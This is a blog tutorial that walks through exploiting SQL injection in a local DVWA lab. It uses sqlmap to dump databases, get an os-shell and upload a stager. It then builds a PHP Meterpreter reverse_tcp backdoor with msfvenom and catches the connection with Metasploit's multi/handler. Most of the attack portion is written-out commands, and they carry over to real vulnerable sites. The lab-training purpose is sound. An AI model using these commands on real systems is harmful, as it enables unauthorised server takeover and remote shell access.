This article is exactly
same as previous article; today I will make use of sqlmap to upload
backdoor filein DVWA suffering from sql injection vulnerbility.
Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, sqlmap tool
Very first
you need to install DVWA lab in your XAMPP or WAMP server, read full article
from here
Now open
the DVWA in your pc and login with following credentials:
Username – admin
Password – password
Click on DVWA Security and set Website Security
Level low
From the
list of vulnerability select SQL Injection for your attack. Type user ID: 1 in
text box. Don’t click on submit button without setting browser proxy. Set
your browser proxy to make burp suite work properly.
Turn
on burp suite click on proxy in menu
bar and go for
intercept is on button. Come back and click on submit button in dvwa. The Intercept
button is used to display HTTP and Web Sockets messages that pass between your
browser and web servers. Burp suit will provide” cookie” and “referrer” under
fetched data which will later use in sqlmap commands.
In
following Sqlmap will analysis the url for making connection from target and
then use sql queries for given cookies to fetch all names of database.
sqlmap -u “http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit”
--cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovma5q47;
security_level=0″ --dbs
So
if you notice image given below it has dumb all name of database. Choose dvwa
to upload php backdoor.
Now Type
following command to run sqlmap to access os-shell of web server (dvwa)
sqlmap -u
“http://192.168.0.102/dvwa/vulnerbilities/sqli/?id=1&submit=sumbit”
--cookie=” security=low; PHPSESSID=jg6ffoh1j1n6pc1ea0ovmane47;
security_level=0″ -D dvwa –os-shell
It will try to generate a backdoor; I want to create
PHP backdoor in target pc therefore type 4 for PHP payload and then Type 4 for
brute force search to use as writable directory to upload
It
is trying to upload the file on “/xampp/htdocs/” by using different sql
injection techniques. As soon as file is uploaded; it will send INFO the file
stager has been successfully uploaded on “/xampp/htdocs/”and you will get
os-shell of victim pc. Other than here it also shows the path where
you can manually upload your backdoor, look at over
highlighted URL:
http://192.168.0.102/tmpunias.php
Explore
the URL:http://192.168.0.102/tmpunais.php on browser. From screenshot you can
read the heading of web page sqlmap file
uploader which
will let you to browse you backdoor on web server(dvwa) and will later upload
that backdoor to following directory (“/xampp/htdocs/” )of web server.
Let’s prepare the malicious file that you would upload
with msfvenom :
msfvenom -p
php/meterpreter/reverse_tcplhost=192.168.0.104 lport=4444 -f raw.
copy
the code from
Now load metasploit framework by typing msfconsole and start multi/handler
Click on browse to
select your shell.php file
and then click on upload.
GREAT!!! Here it shows Admin File is uploaded which
means backdoor shell.php
is uploaded.
To execute
backdoor on target pc run URL:192.168.0.102/shell.php on
browser and you will receive reverse connection to multi/handler.
msf> use multi/handler
msf exploit(handler) > set lport 4444
msf exploit(handler) > set lhost 192.168.0.104
msf exploit(handler) > set payload
php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
meterpreter>sysinfo
Divine!!! meterpreter session is opened .
0 comments:
Post a Comment